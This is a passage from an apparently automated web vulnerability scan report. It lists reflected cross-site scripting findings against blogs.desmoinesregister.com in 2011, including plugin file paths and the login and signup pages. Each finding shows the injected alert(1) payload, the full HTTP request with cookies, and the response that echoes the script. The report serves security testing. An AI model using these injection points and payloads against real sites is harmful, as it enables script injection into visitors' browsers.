Content-Length: 69483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202" />
...[SNIP]...

1.117. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32dec"%3balert(1)//9a97554e736 was submitted in the REST URL parameter 6. This input was echoed as 32dec";alert(1)//9a97554e736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec"%3balert(1)//9a97554e736?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69775

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec";alert(1)//9a97554e736","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.118. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b88e4"><script>alert(1)</script>22ba7e59903 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903" />
...[SNIP]...

1.119. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5488"><script>alert(1)</script>683302c7758 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758" />
...[SNIP]...

1.120. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe488"%3balert(1)//e8899a6b1a0 was submitted in the REST URL parameter 6. This input was echoed as fe488";alert(1)//e8899a6b1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488"%3balert(1)//e8899a6b1a0?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69819

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
ript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488";alert(1)//e8899a6b1a0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.121. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dfeb"><script>alert(1)</script>1d5781cdb1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1" />
...[SNIP]...

1.122. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dda02"%3balert(1)//835bdff0c58 was submitted in the REST URL parameter 6. This input was echoed as dda02";alert(1)//835bdff0c58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02"%3balert(1)//835bdff0c58?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
cript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02";alert(1)//835bdff0c58","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.123. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51ec4"%3balert(1)//2ac9bdf6711 was submitted in the REST URL parameter 5. This input was echoed as 51ec4";alert(1)//2ac9bdf6711 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.css51ec4"%3balert(1)//2ac9bdf6711?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
uires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css51ec4";alert(1)//2ac9bdf6711","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.124. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e743e"><script>alert(1)</script>045c9ac9fe9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69466

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9" />
...[SNIP]...

1.125. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4b81"%3balert(1)//ea5f78fe07a was submitted in the REST URL parameter 6. This input was echoed as d4b81";alert(1)//ea5f78fe07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81"%3balert(1)//ea5f78fe07a HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69717

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
quires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81";alert(1)//ea5f78fe07a","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.126. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 291b0"><script>alert(1)</script>9616e98d8c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69793

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6" />
...[SNIP]...

1.127. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f8e"><script>alert(1)</script>917b1fb18f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2" />
...[SNIP]...

1.128. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36671"%3balert(1)//1caaebcb5b0 was submitted in the REST URL parameter 5. This input was echoed as 36671";alert(1)//1caaebcb5b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/login.html36671"%3balert(1)//1caaebcb5b0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html36671";alert(1)//1caaebcb5b0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.129. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc42"%3balert(1)//d198b406e30 was submitted in the REST URL parameter 5. This input was echoed as 9fc42";alert(1)//d198b406e30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.html9fc42"%3balert(1)//d198b406e30 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69695

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html9fc42";alert(1)//d198b406e30","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.130. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d8"><script>alert(1)</script>8108b2c0f8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
